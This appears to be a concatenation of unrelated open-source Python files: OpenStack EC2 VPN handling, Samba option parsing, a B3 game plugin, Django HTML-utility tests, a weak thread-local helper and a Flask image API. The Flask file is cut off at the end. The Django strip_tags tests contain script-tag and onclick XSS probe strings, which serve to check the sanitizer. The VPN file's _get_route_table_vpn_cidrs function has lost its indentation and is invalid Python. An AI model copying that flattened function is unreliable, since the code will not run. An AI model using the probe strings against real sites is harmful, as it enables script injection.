    # Cache CIDR computation per route table: many subnets commonly share
    # the same (possibly default) route table.
    route_tables_cidrs = {}
    for subnet in subnets:
        route_table_id = subnet.get('route_table_id', vpc['route_table_id'])
        if route_table_id not in route_tables_cidrs:
            route_tables_cidrs[route_table_id] = (
                _get_route_table_vpn_cidrs(route_tables[route_table_id],
                                           vpn_gateway, vpn_connections))
        cidrs = route_tables_cidrs[route_table_id]
        for vpn_conn in vpn_connections:
            if vpn_conn['id'] in cidrs:
                _set_subnet_vpn(
                    context, neutron, cleaner, subnet, vpn_conn,
                    customer_gateways[vpn_conn['customer_gateway_id']],
                    cidrs[vpn_conn['id']])
            else:
                _delete_subnet_vpn(context, neutron, cleaner, subnet, vpn_conn)
def _set_subnet_vpn(context, neutron, cleaner, subnet, vpn_connection,
                    customer_gateway, cidrs):
    """Create or update the Neutron site connection for (subnet, vpn).

    If a connection already exists for the subnet, only its peer CIDRs are
    refreshed; otherwise a new responder-only connection is created and
    recorded in the DB, with rollback callbacks registered on *cleaner*.
    """
    subnets_connections = vpn_connection['os_ipsec_site_connections']
    os_connection_id = subnets_connections.get(subnet['id'])
    if os_connection_id:
        # TODO(ft): restore original peer_cidrs on crash
        neutron.update_ipsec_site_connection(
            os_connection_id,
            {'ipsec_site_connection': {'peer_cidrs': cidrs}})
    else:
        os_connection = {
            'vpnservice_id': subnet['os_vpnservice_id'],
            'ikepolicy_id': vpn_connection['os_ikepolicy_id'],
            'ipsecpolicy_id': vpn_connection['os_ipsecpolicy_id'],
            'peer_address': customer_gateway['ip_address'],
            'peer_cidrs': cidrs,
            'psk': vpn_connection['pre_shared_key'],
            'name': '%s/%s' % (vpn_connection['id'], subnet['id']),
            'peer_id': customer_gateway['ip_address'],
            # MTU is sized so the resulting MSS equals the AWS default.
            'mtu': AWS_MSS + MTU_MSS_DELTA,
            # The customer gateway initiates; we only respond.
            'initiator': 'response-only',
        }
        os_connection = (neutron.create_ipsec_site_connection(
            {'ipsec_site_connection': os_connection})
            ['ipsec_site_connection'])
        cleaner.addCleanup(neutron.delete_ipsec_site_connection,
                           os_connection['id'])
        _add_subnet_connection_to_vpn_connection_item(
            context, vpn_connection, subnet['id'], os_connection['id'])
        cleaner.addCleanup(_remove_subnet_connection_from_vpn_connection_item,
                           context, vpn_connection, subnet['id'])
def _delete_subnet_vpn(context, neutron, cleaner, subnet, vpn_connection):
    """Remove the Neutron site connection for (subnet, vpn), if any.

    The DB record is dropped before the Neutron object so a stale id never
    survives; *cleaner* gets a callback to restore the record on rollback.
    """
    subnets_connections = vpn_connection['os_ipsec_site_connections']
    os_connection_id = subnets_connections.get(subnet['id'])
    if not os_connection_id:
        return
    _remove_subnet_connection_from_vpn_connection_item(
        context, vpn_connection, subnet['id'])
    cleaner.addCleanup(_add_subnet_connection_to_vpn_connection_item,
                       context, vpn_connection, subnet['id'], os_connection_id)
    try:
        neutron.delete_ipsec_site_connection(os_connection_id)
    except neutron_exception.NotFound:
        pass
def _get_route_table_vpn_cidrs(route_table, vpn_gateway, vpn_connections):
static_cidrs = [route['destination_cidr_block']
for route in route_table['routes']
if route.get('gateway_id') == vpn_gateway['id']]
is_propagation_enabled = (
vpn_gateway['id'] in route_table.get('propagating_gateways', []))
vpn_cidrs = {}
for vpn in vpn_connections:
if is_propagation_enabled:
cidrs = list(set(static_cidrs + vpn['cidrs']))
else:
cidrs = static_cidrs
if cidrs:
vpn_cidrs[vpn['id']] = cidrs
return vpn_cidrs
def _get_vpn_gateways_external_ips(context, neutron):
    """Map each VPC-attached VPN gateway id to its router's external IPv4.

    Unattached gateways are skipped; gateways whose router has no IPv4
    external fixed ip map to None.
    """
    vpcs = {vpc['id']: vpc
            for vpc in db_api.get_items(context, 'vpc')}
    external_ips = {}
    routers = neutron.list_routers(
        tenant_id=context.project_id)['routers']
    for router in routers:
        info = router['external_gateway_info']
        if info:
            # Keep the last IPv4 found; IPv6 fixed ips are ignored.
            for ip in info['external_fixed_ips']:
                if netaddr.valid_ipv4(ip['ip_address']):
                    external_ips[router['id']] = ip['ip_address']
    # NOTE(review): assumes vpc['os_id'] is the Neutron router id — confirm
    # against the VPC creation code elsewhere in the project.
    return {vgw['id']: external_ips.get(vpcs[vgw['vpc_id']]['os_id'])
            for vgw in db_api.get_items(context, 'vgw')
            if vgw['vpc_id']}
def _add_cidr_to_vpn_connection_item(context, vpn_connection, cidr):
    """Append *cidr* to the VPN connection's route list and persist it."""
    vpn_connection['cidrs'].append(cidr)
    db_api.update_item(context, vpn_connection)
def _remove_cidr_from_vpn_connection_item(context, vpn_connection, cidr):
    """Remove *cidr* from the VPN connection's route list and persist it."""
    vpn_connection['cidrs'].remove(cidr)
    db_api.update_item(context, vpn_connection)
def _add_subnet_connection_to_vpn_connection_item(context, vpn_connection,
                                                  subnet_id, os_connection_id):
    """Record the subnet's Neutron site connection id and persist the item."""
    vpn_connection['os_ipsec_site_connections'][subnet_id] = os_connection_id
    db_api.update_item(context, vpn_connection)
def _remove_subnet_connection_from_vpn_connection_item(context, vpn_connection,
                                                       subnet_id):
    """Drop the subnet's Neutron site connection id and persist the item.

    Raises KeyError if no connection is recorded for *subnet_id*.
    """
    del vpn_connection['os_ipsec_site_connections'][subnet_id]
    db_api.update_item(context, vpn_connection)
| stackforge/ec2-api | ec2api/api/vpn_connection.py | Python | apache-2.0 | 21,863 |
# Samba-specific bits for optparse
# Copyright (C) Jelmer Vernooij <jelmer@samba.org> 2007
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Support for parsing Samba-related command-line options."""
__docformat__ = "restructuredText"
import optparse
import os
from samba.credentials import (
Credentials,
AUTO_USE_KERBEROS,
DONT_USE_KERBEROS,
MUST_USE_KERBEROS,
)
from samba.hostconfig import Hostconfig
import sys
class SambaOptions(optparse.OptionGroup):
    """General Samba-related command line options.

    Collects the options shared by most Samba tools (configuration file,
    debug level, ad-hoc smb.conf overrides, realm) and applies them to an
    internal LoadParm instance.
    """

    def __init__(self, parser):
        # Imported lazily so importing this module does not require the
        # samba.param extension to be loadable.
        from samba.param import LoadParm
        optparse.OptionGroup.__init__(self, parser, "Samba Common Options")
        self.add_option("-s", "--configfile", action="callback",
                        type=str, metavar="FILE", help="Configuration file",
                        callback=self._load_configfile)
        self.add_option("-d", "--debuglevel", action="callback",
                        type=int, metavar="DEBUGLEVEL", help="debug level",
                        callback=self._set_debuglevel)
        self.add_option("--option", action="callback",
                        type=str, metavar="OPTION",
                        help="set smb.conf option from command line",
                        callback=self._set_option)
        self.add_option("--realm", action="callback",
                        type=str, metavar="REALM", help="set the realm name",
                        callback=self._set_realm)
        self._configfile = None
        self._lp = LoadParm()
        self.realm = None

    def get_loadparm_path(self):
        """Return path to the smb.conf file specified on the command line."""
        return self._configfile

    def _load_configfile(self, option, opt_str, arg, parser):
        # Only remember the path; it is loaded in get_loadparm() so later
        # options can still influence the parameters.
        self._configfile = arg

    def _set_debuglevel(self, option, opt_str, arg, parser):
        if arg < 0:
            raise optparse.OptionValueError("invalid %s option value: %s" %
                                            (opt_str, arg))
        self._lp.set('debug level', str(arg))

    def _set_realm(self, option, opt_str, arg, parser):
        self._lp.set('realm', arg)
        self.realm = arg

    def _set_option(self, option, opt_str, arg, parser):
        if arg.find('=') == -1:
            raise optparse.OptionValueError(
                "--option option takes a 'a=b' argument")
        # Split on the first '=' only, so option values may themselves
        # contain '=' (previously such values were silently truncated).
        a = arg.split('=', 1)
        try:
            self._lp.set(a[0], a[1])
        except Exception as e:
            raise optparse.OptionValueError(
                "invalid --option option value %r: %s" % (arg, e))

    def get_loadparm(self):
        """Return loadparm object with data specified on the command line.

        Precedence: explicit -s/--configfile, then $SMB_CONF_PATH, then
        the compiled-in default configuration.
        """
        if self._configfile is not None:
            self._lp.load(self._configfile)
        elif os.getenv("SMB_CONF_PATH") is not None:
            self._lp.load(os.getenv("SMB_CONF_PATH"))
        else:
            self._lp.load_default()
        return self._lp

    def get_hostconfig(self):
        """Return a Hostconfig wrapper around the effective loadparm."""
        return Hostconfig(self.get_loadparm())
class VersionOptions(optparse.OptionGroup):
    """Command line option for printing Samba version."""

    def __init__(self, parser):
        optparse.OptionGroup.__init__(self, parser, "Version Options")
        self.add_option("-V", "--version", action="callback",
                        callback=self._display_version,
                        help="Display version number")

    def _display_version(self, option, opt_str, arg, parser):
        """Print the Samba version and exit successfully."""
        import samba
        # Parenthesized form is valid on both Python 2 and Python 3
        # (the bare `print samba.version` statement is Python-2-only).
        print(samba.version)
        sys.exit(0)
def parse_kerberos_arg(arg, opt_str):
    """Translate a -k/--kerberos argument into a Kerberos-state constant.

    Accepts yes/true/1, no/false/0 and auto (case-insensitive); anything
    else raises optparse.OptionValueError.
    """
    value = arg.lower()
    if value in ("yes", "true", "1"):
        return MUST_USE_KERBEROS
    if value in ("no", "false", "0"):
        return DONT_USE_KERBEROS
    if value == "auto":
        return AUTO_USE_KERBEROS
    raise optparse.OptionValueError("invalid %s option value: %s" %
                                    (opt_str, arg))
class CredentialsOptions(optparse.OptionGroup):
    """Command line options for specifying credentials.

    Every option feeds a shared samba Credentials object via optparse
    callbacks; get_credentials() finalizes it against a loadparm context.
    """
    def __init__(self, parser):
        # Until --password is seen we may still prompt interactively.
        self.no_pass = True
        self.ipaddress = None
        optparse.OptionGroup.__init__(self, parser, "Credentials Options")
        self.add_option("--simple-bind-dn", metavar="DN", action="callback",
                        callback=self._set_simple_bind_dn, type=str,
                        help="DN to use for a simple bind")
        self.add_option("--password", metavar="PASSWORD", action="callback",
                        help="Password", type=str, callback=self._set_password)
        self.add_option("-U", "--username", metavar="USERNAME",
                        action="callback", type=str,
                        help="Username", callback=self._parse_username)
        self.add_option("-W", "--workgroup", metavar="WORKGROUP",
                        action="callback", type=str,
                        help="Workgroup", callback=self._parse_workgroup)
        self.add_option("-N", "--no-pass", action="store_true",
                        help="Don't ask for a password")
        self.add_option("-k", "--kerberos", metavar="KERBEROS",
                        action="callback", type=str,
                        help="Use Kerberos", callback=self._set_kerberos)
        self.add_option("", "--ipaddress", metavar="IPADDRESS",
                        action="callback", type=str,
                        help="IP address of server",
                        callback=self._set_ipaddress)
        self.creds = Credentials()
    def _parse_username(self, option, opt_str, arg, parser):
        # May carry DOMAIN\\user or user%password forms; Credentials parses.
        self.creds.parse_string(arg)
    def _parse_workgroup(self, option, opt_str, arg, parser):
        self.creds.set_domain(arg)
    def _set_password(self, option, opt_str, arg, parser):
        self.creds.set_password(arg)
        # An explicit password disables interactive prompting.
        self.no_pass = False
    def _set_ipaddress(self, option, opt_str, arg, parser):
        self.ipaddress = arg
    def _set_kerberos(self, option, opt_str, arg, parser):
        self.creds.set_kerberos_state(parse_kerberos_arg(arg, opt_str))
    def _set_simple_bind_dn(self, option, opt_str, arg, parser):
        self.creds.set_bind_dn(arg)
    def get_credentials(self, lp, fallback_machine=False):
        """Obtain the credentials set on the command-line.

        :param lp: Loadparm object to use.
        :return: Credentials object
        """
        self.creds.guess(lp)
        if self.no_pass:
            self.creds.set_cmdline_callbacks()
        # possibly fallback to using the machine account, if we have
        # access to the secrets db
        if fallback_machine and not self.creds.authentication_requested():
            try:
                self.creds.set_machine_account(lp)
            except Exception:
                pass
        return self.creds
class CredentialsOptionsDouble(CredentialsOptions):
    """Command line options for specifying credentials of two servers.

    Inherits the primary-server options and adds *2-suffixed variants that
    populate a second, independent Credentials object.
    """
    def __init__(self, parser):
        CredentialsOptions.__init__(self, parser)
        self.no_pass2 = True
        self.add_option("--simple-bind-dn2", metavar="DN2", action="callback",
                        callback=self._set_simple_bind_dn2, type=str,
                        help="DN to use for a simple bind")
        self.add_option("--password2", metavar="PASSWORD2", action="callback",
                        help="Password", type=str,
                        callback=self._set_password2)
        self.add_option("--username2", metavar="USERNAME2",
                        action="callback", type=str,
                        help="Username for second server",
                        callback=self._parse_username2)
        self.add_option("--workgroup2", metavar="WORKGROUP2",
                        action="callback", type=str,
                        help="Workgroup for second server",
                        callback=self._parse_workgroup2)
        self.add_option("--no-pass2", action="store_true",
                        help="Don't ask for a password for the second server")
        self.add_option("--kerberos2", metavar="KERBEROS2",
                        action="callback", type=str,
                        help="Use Kerberos", callback=self._set_kerberos2)
        self.creds2 = Credentials()
    def _parse_username2(self, option, opt_str, arg, parser):
        self.creds2.parse_string(arg)
    def _parse_workgroup2(self, option, opt_str, arg, parser):
        self.creds2.set_domain(arg)
    def _set_password2(self, option, opt_str, arg, parser):
        self.creds2.set_password(arg)
        self.no_pass2 = False
    def _set_kerberos2(self, option, opt_str, arg, parser):
        self.creds2.set_kerberos_state(parse_kerberos_arg(arg, opt_str))
    def _set_simple_bind_dn2(self, option, opt_str, arg, parser):
        self.creds2.set_bind_dn(arg)
    def get_credentials2(self, lp, guess=True):
        """Obtain the credentials set on the command-line.

        :param lp: Loadparm object to use.
        :param guess: Try guess Credentials from environment
        :return: Credentials object
        """
        if guess:
            self.creds2.guess(lp)
        elif not self.creds2.get_username():
            # No guessing and no explicit user: fall back to anonymous.
            self.creds2.set_anonymous()
        if self.no_pass2:
            self.creds2.set_cmdline_callbacks()
        return self.creds2
| yasoob/PythonRSSReader | venv/lib/python2.7/dist-packages/samba/getopt.py | Python | mit | 9,947 |
#Team changer develop by pedrxd.
__version__ = '0.1'
__author__ = 'pedrxd'
import b3
import b3.events
import b3.plugin
import time
class TeamchangerPlugin(b3.plugin.Plugin):
    """B3 plugin adding admin commands to force players onto a team."""
    requiresConfigFile = False

    def setTeam(self, client, team):
        """Issue the server command that forces *client* onto *team*."""
        self.console.write('forceteam %s %s' % (client.cid, team))

    def onStartup(self):
        """Register the plugin's commands with the admin plugin."""
        self._adminPlugin = self.console.getPlugin('admin')
        if not self._adminPlugin:
            self.error('Could not find admin plugin')
            return
        self._adminPlugin.registerCommand(self, 'red', 40, self.red)
        self._adminPlugin.registerCommand(self, 'blue', 40, self.blue)
        self._adminPlugin.registerCommand(self, 'spec', 40, self.spec)
        self._adminPlugin.registerCommand(self, 'replay', 40, self.replay, 'rp')
        self._adminPlugin.registerCommand(self, 'auto', 40, self.auto)

    def _target_client(self, data, client):
        """Resolve the command target: the named player, or the caller.

        Returns None (after prompting) when the named player is not found.
        """
        if data:
            return self._adminPlugin.findClientPrompt(data, client)
        return client

    def red(self, data, client, cmd):
        """Move a player (or yourself) to the red team"""
        sclient = self._target_client(data, client)
        if not sclient:
            return
        self.setTeam(sclient, 'red')
        sclient.message('Moved to red team')

    def blue(self, data, client, cmd):
        """Move a player (or yourself) to the blue team"""
        sclient = self._target_client(data, client)
        if not sclient:
            return
        self.setTeam(sclient, 'blue')
        sclient.message('Moved to blue team')

    def spec(self, data, client, cmd):
        """Move a player (or yourself) to the spectators"""
        sclient = self._target_client(data, client)
        if not sclient:
            return
        self.setTeam(sclient, 'spectator')
        sclient.message('Moved to spec')

    def replay(self, data, client, cmd):
        """Send a player to spec and straight back into the game"""
        sclient = self._target_client(data, client)
        if not sclient:
            return
        self.setTeam(sclient, 'spectator')
        self.setTeam(sclient, 'free')
        sclient.message('Replay correctly')

    def auto(self, data, client, cmd):
        """Put a player (or yourself) back into auto-join"""
        sclient = self._target_client(data, client)
        if not sclient:
            return
        self.setTeam(sclient, 'free')
        sclient.message('Correctly AutoJoin')
| pedrxd/TeamChanger-b3 | extplugins/teamchanger.py | Python | gpl-3.0 | 2,557 |
import os
from datetime import datetime
from django.test import SimpleTestCase
from django.utils import html, safestring
from django.utils.encoding import force_text
from django.utils.functional import lazystr
class TestUtilsHtml(SimpleTestCase):
    """Tests for the helpers in django.utils.html (escape, strip_tags, ...)."""
    def check_output(self, function, value, output=None):
        """
        function(value) equals output. If output is None, function(value)
        equals value.
        """
        if output is None:
            output = value
        self.assertEqual(function(value), output)
    def test_escape(self):
        f = html.escape
        # (raw character, expected HTML entity) pairs.
        items = (
            ('&', '&amp;'),
            ('<', '&lt;'),
            ('>', '&gt;'),
            ('"', '&quot;'),
            ("'", '&#39;'),
        )
        # Substitution patterns for testing the above items.
        patterns = ("%s", "asdf%sfdsa", "%s1", "1%sb")
        for value, output in items:
            for pattern in patterns:
                self.check_output(f, pattern % value, pattern % output)
                # escape() must also handle lazy strings.
                self.check_output(f, lazystr(pattern % value), pattern % output)
            # Check repeated values.
            self.check_output(f, value * 2, output * 2)
        # Verify it doesn't double replace &.
        self.check_output(f, '<&', '&lt;&amp;')
    def test_format_html(self):
        # Positional/keyword args are escaped unless already marked safe.
        self.assertEqual(
            html.format_html("{} {} {third} {fourth}",
                             "< Dangerous >",
                             html.mark_safe("<b>safe</b>"),
                             third="< dangerous again",
                             fourth=html.mark_safe("<i>safe again</i>")
                             ),
            "&lt; Dangerous &gt; <b>safe</b> &lt; dangerous again <i>safe again</i>"
        )
    def test_linebreaks(self):
        f = html.linebreaks
        # Double newlines become paragraphs, single ones become <br />.
        items = (
            ("para1\n\npara2\r\rpara3", "<p>para1</p>\n\n<p>para2</p>\n\n<p>para3</p>"),
            ("para1\nsub1\rsub2\n\npara2", "<p>para1<br />sub1<br />sub2</p>\n\n<p>para2</p>"),
            ("para1\r\n\r\npara2\rsub1\r\rpara4", "<p>para1</p>\n\n<p>para2<br />sub1</p>\n\n<p>para4</p>"),
            ("para1\tmore\n\npara2", "<p>para1\tmore</p>\n\n<p>para2</p>"),
        )
        for value, output in items:
            self.check_output(f, value, output)
            self.check_output(f, lazystr(value), output)
    def test_strip_tags(self):
        f = html.strip_tags
        # Pairs of (input, expected); entities are preserved, tags removed,
        # and stray '<'/'>' that are not tags pass through.
        items = (
            ('<p>See: &#39;&eacute; is an apostrophe followed by e acute</p>',
             'See: &#39;&eacute; is an apostrophe followed by e acute'),
            ('<adf>a', 'a'),
            ('</adf>a', 'a'),
            ('<asdf><asdf>e', 'e'),
            ('hi, <f x', 'hi, <f x'),
            ('234<235, right?', '234<235, right?'),
            ('a4<a5 right?', 'a4<a5 right?'),
            ('b7>b2!', 'b7>b2!'),
            ('</fe', '</fe'),
            ('<x>b<y>', 'b'),
            ('a<p onclick="alert(\'<test>\')">b</p>c', 'abc'),
            ('a<p a >b</p>c', 'abc'),
            ('d<a:b c:d>e</p>f', 'def'),
            ('<strong>foo</strong><a href="http://example.com">bar</a>', 'foobar'),
            # caused infinite loop on Pythons not patched with
            # http://bugs.python.org/issue20288
            ('&gotcha&#;<>', '&gotcha&#;<>'),
        )
        for value, output in items:
            self.check_output(f, value, output)
            self.check_output(f, lazystr(value), output)
        # Some convoluted syntax for which parsing may differ between python versions
        output = html.strip_tags('<sc<!-- -->ript>test<<!-- -->/script>')
        self.assertNotIn('<script>', output)
        self.assertIn('test', output)
        output = html.strip_tags('<script>alert()</script>&h')
        self.assertNotIn('<script>', output)
        self.assertIn('alert()', output)
        # Test with more lengthy content (also catching performance regressions)
        for filename in ('strip_tags1.html', 'strip_tags2.txt'):
            path = os.path.join(os.path.dirname(__file__), 'files', filename)
            with open(path, 'r') as fp:
                content = force_text(fp.read())
                start = datetime.now()
                stripped = html.strip_tags(content)
                elapsed = datetime.now() - start
            # A whole-seconds bound: large inputs must strip in under 1s.
            self.assertEqual(elapsed.seconds, 0)
            self.assertIn("Please try again.", stripped)
            self.assertNotIn('<', stripped)
    def test_strip_spaces_between_tags(self):
        f = html.strip_spaces_between_tags
        # Strings that should come out untouched.
        items = (' <adf>', '<adf> ', ' </adf> ', ' <f> x</f>')
        for value in items:
            self.check_output(f, value)
            self.check_output(f, lazystr(value))
        # Strings that have spaces to strip.
        items = (
            ('<d> </d>', '<d></d>'),
            ('<p>hello </p>\n<p> world</p>', '<p>hello </p><p> world</p>'),
            ('\n<p>\t</p>\n<p> </p>\n', '\n<p></p><p></p>\n'),
        )
        for value, output in items:
            self.check_output(f, value, output)
            self.check_output(f, lazystr(value), output)
    def test_escapejs(self):
        f = html.escapejs
        # JS-dangerous characters are emitted as \uXXXX escapes.
        items = (
            ('"double quotes" and \'single quotes\'', '\\u0022double quotes\\u0022 and \\u0027single quotes\\u0027'),
            (r'\ : backslashes, too', '\\u005C : backslashes, too'),
            (
                'and lots of whitespace: \r\n\t\v\f\b',
                'and lots of whitespace: \\u000D\\u000A\\u0009\\u000B\\u000C\\u0008'
            ),
            (r'<script>and this</script>', '\\u003Cscript\\u003Eand this\\u003C/script\\u003E'),
            (
                'paragraph separator:\u2029and line separator:\u2028',
                'paragraph separator:\\u2029and line separator:\\u2028'
            ),
        )
        for value, output in items:
            self.check_output(f, value, output)
            self.check_output(f, lazystr(value), output)
    def test_smart_urlquote(self):
        quote = html.smart_urlquote
        # IDNs are properly quoted
        self.assertEqual(quote('http://\u00f6\u00e4\u00fc.com/'), 'http://xn--4ca9at.com/')
        self.assertEqual(quote('http://\u00f6\u00e4\u00fc.com/\u00f6\u00e4\u00fc/'), 'http://xn--4ca9at.com/%C3%B6%C3%A4%C3%BC/')
        # Everything unsafe is quoted, !*'();:@&=+$,/?#[]~ is considered safe as per RFC
        self.assertEqual(quote('http://example.com/path/\u00f6\u00e4\u00fc/'), 'http://example.com/path/%C3%B6%C3%A4%C3%BC/')
        self.assertEqual(quote('http://example.com/%C3%B6/\u00e4/'), 'http://example.com/%C3%B6/%C3%A4/')
        self.assertEqual(quote('http://example.com/?x=1&y=2+3&z='), 'http://example.com/?x=1&y=2+3&z=')
        self.assertEqual(quote('http://example.com/?x=<>"\''), 'http://example.com/?x=%3C%3E%22%27')
        self.assertEqual(quote('http://example.com/?q=http://example.com/?x=1%26q=django'),
                         'http://example.com/?q=http%3A%2F%2Fexample.com%2F%3Fx%3D1%26q%3Ddjango')
        self.assertEqual(quote('http://example.com/?q=http%3A%2F%2Fexample.com%2F%3Fx%3D1%26q%3Ddjango'),
                         'http://example.com/?q=http%3A%2F%2Fexample.com%2F%3Fx%3D1%26q%3Ddjango')
    def test_conditional_escape(self):
        # Plain strings get escaped; safe strings pass through unchanged.
        s = '<h1>interop</h1>'
        self.assertEqual(html.conditional_escape(s),
                         '&lt;h1&gt;interop&lt;/h1&gt;')
        self.assertEqual(html.conditional_escape(safestring.mark_safe(s)), s)
    def test_html_safe(self):
        # @html_safe adds an __html__ that mirrors __str__.
        @html.html_safe
        class HtmlClass:
            def __str__(self):
                return "<h1>I'm a html class!</h1>"
        html_obj = HtmlClass()
        self.assertTrue(hasattr(HtmlClass, '__html__'))
        self.assertTrue(hasattr(html_obj, '__html__'))
        self.assertEqual(force_text(html_obj), html_obj.__html__())
    def test_html_safe_subclass(self):
        class BaseClass:
            def __html__(self):
                # defines __html__ on its own
                return 'some html content'
            def __str__(self):
                return 'some non html content'
        @html.html_safe
        class Subclass(BaseClass):
            def __str__(self):
                # overrides __str__ and is marked as html_safe
                return 'some html safe content'
        subclass_obj = Subclass()
        self.assertEqual(force_text(subclass_obj), subclass_obj.__html__())
    def test_html_safe_defines_html_error(self):
        # Decorating a class that already defines __html__ must fail loudly.
        msg = "can't apply @html_safe to HtmlClass because it defines __html__()."
        with self.assertRaisesMessage(ValueError, msg):
            @html.html_safe
            class HtmlClass:
                def __html__(self):
                    return "<h1>I'm a html class!</h1>"
    def test_html_safe_doesnt_define_str(self):
        # ...as must decorating a class with no __str__ to mirror.
        msg = "can't apply @html_safe to HtmlClass because it doesn't define __str__()."
        with self.assertRaisesMessage(ValueError, msg):
            @html.html_safe
            class HtmlClass:
                pass
| twz915/django | tests/utils_tests/test_html.py | Python | bsd-3-clause | 9,021 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Local storage of variables using weak references"""
import threading
import weakref
class WeakLocal(threading.local):
    """Thread-local storage whose values are held only by weak reference.

    Attribute reads dereference the stored weakref transparently, so a
    value that has been garbage-collected reads back as None.
    """
    def __getattribute__(self, attr):
        ref = super(WeakLocal, self).__getattribute__(attr)
        if ref:
            # What is stored is a weak reference, not the value itself,
            # so dereference it before handing it back to the caller.
            ref = ref()
        return ref

    def __setattr__(self, attr, value):
        # Store only a weak reference; the caller keeps ownership.
        return super(WeakLocal, self).__setattr__(attr, weakref.ref(value))
# NOTE(mikal): the name "store" should be deprecated in the future
store = WeakLocal()
# A "weak" store uses weak references and allows an object to fall out of scope
# when it falls out of scope in the code that uses the thread local storage. A
# "strong" store will hold a reference to the object so that it never falls out
# of scope.
weak_store = WeakLocal()
strong_store = threading.local()
| kickstandproject/wildcard | wildcard/openstack/common/local.py | Python | apache-2.0 | 1,722 |
# -*- coding: utf-8 -*-
###############################################################################
# Copyright (c) 2017 Merantix GmbH
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# which accompanies this distribution, and is available at
# http://www.eclipse.org/legal/epl-v10.html
#
# Contributors:
# Jan Steinke - Restful API
###############################################################################
"""Flask blueprint for accessing and manipulating image ressources
This is used by the main flask application to provide a REST API.
"""
import os
import shutil
import logging
from tempfile import mkdtemp
from PIL import Image
from werkzeug.utils import secure_filename
from flask import (
Blueprint,
current_app,
jsonify,
session,
request,
send_from_directory)
from picasso import __version__
from picasso.utils import (
get_app_state,
get_visualizations
)
API = Blueprint('api', __name__)
logger = logging.getLogger(__name__)
@API.before_request
def initialize_new_session():
    """Check session and initialize if necessary

    Runs before every request: seeds the per-session image list and uid
    counter, and creates the temporary upload/output directories, the
    first time they are needed.
    """
    if 'image_uid_counter' not in session or 'image_list' not in session:
        # reset image list counter for the session
        session['image_uid_counter'] = 0
        session['image_list'] = []
    else:
        logger.debug('images are already being tracked')
    if 'img_input_dir' not in session or 'img_output_dir' not in session:
        # make image upload directory
        session['img_input_dir'] = mkdtemp()
        session['img_output_dir'] = mkdtemp()
    else:
        logger.debug('temporary image directories already exist')
@API.route('/', methods=['GET'])
def root():
    """Greet callers at the API root with a version message."""
    message = ('Picasso {version}. '
               'See API documentation at: '
               'https://picasso.readthedocs.io/en/latest/api.html'
               .format(version=__version__))
    return jsonify(message=message, version=__version__)
@API.route('/app_state', methods=['GET'])
def app_state():
    """Expose the current application state as JSON."""
    return jsonify(get_app_state())
@API.route('/images', methods=['POST', 'GET'])
def images():
    """Upload (POST) or list (GET) the session's images.

    POST expects a multipart form with a ``file`` field; the filename is
    sanitized before saving and the response carries the stored filename
    plus a session-unique uid. GET returns the list of uploaded images.

    TODO: return file URL instead of filename
    """
    if request.method == 'POST':
        # Use .get() rather than ['file']: a POST missing the field should
        # yield the documented {ok: "false"} body, not a 400 error page.
        file_upload = request.files.get('file')
        if file_upload:
            image = dict()
            image['filename'] = secure_filename(file_upload.filename)
            full_path = os.path.join(session['img_input_dir'],
                                     image['filename'])
            file_upload.save(full_path)
            image['uid'] = session['image_uid_counter']
            session['image_uid_counter'] += 1
            current_app.logger.debug('File %d is saved as %s',
                                     image['uid'],
                                     image['filename'])
            session['image_list'].append(image)
            return jsonify(ok="true", file=image['filename'], uid=image['uid'])
        return jsonify(ok="false")
    # Flask only routes GET and POST here, so this branch is GET.
    return jsonify(images=session['image_list'])
@API.route('/visualizers', methods=['GET'])
def visualizers():
    """Get a list of available visualizers

    Responds with a JSON list of the registered visualizer names.
    """
    available = [{'name': name} for name in get_visualizations()]
    return jsonify(visualizers=available)
@API.route('/visualizers/<vis_name>', methods=['GET'])
def visualizers_information(vis_name):
    """Return the allowed settings of a single visualizer as JSON."""
    visualizer = get_visualizations()[vis_name]
    return jsonify(settings=visualizer.ALLOWED_SETTINGS)
@API.route('/visualize', methods=['GET'])
def visualize():
    """Trigger a visualization via the REST API

    Takes a single image and generates the visualization data, returning the
    output exactly as given by the target visualization.
    """
    # Settings are rebuilt per request from query parameters, falling back
    # to the first allowed value for each setting.
    session['settings'] = {}
    image_uid = request.args.get('image')
    vis_name = request.args.get('visualizer')
    vis = get_visualizations()[vis_name]
    if vis.ALLOWED_SETTINGS:
        for key in vis.ALLOWED_SETTINGS.keys():
            if request.args.get(key) is not None:
                session['settings'][key] = request.args.get(key)
            else:
                session['settings'][key] = vis.ALLOWED_SETTINGS[key][0]
    else:
        logger.debug('Selected Visualizer {0} has no settings.'.format(vis_name))
    inputs = []
    for image in session['image_list']:
        if image['uid'] == int(image_uid):
            full_path = os.path.join(session['img_input_dir'],
                                     image['filename'])
            entry = dict()
            entry['filename'] = image['filename']
            entry['data'] = Image.open(full_path)
            inputs.append(entry)
    vis.update_settings(session['settings'])
    output = vis.make_visualization(
        inputs, output_dir=session['img_output_dir'])
    # NOTE(review): an unknown image uid leaves `inputs` empty; output[0]
    # then presumably raises (500) — confirm intended error behavior.
    return jsonify(output[0])
@API.route('/reset', methods=['GET'])
def reset():
    """Delete the session and clear temporary directories.

    ignore_errors=True keeps a repeated reset (or an externally removed
    directory) from turning into a 500.
    """
    shutil.rmtree(session['img_input_dir'], ignore_errors=True)
    shutil.rmtree(session['img_output_dir'], ignore_errors=True)
    session.clear()
    return jsonify(ok='true')
@API.route('/inputs/<filename>')
def download_inputs(filename):
    """Serve an uploaded (input) image from the session's input directory."""
    return send_from_directory(session['img_input_dir'], filename)
@API.route('/outputs/<filename>')
def download_outputs(filename):
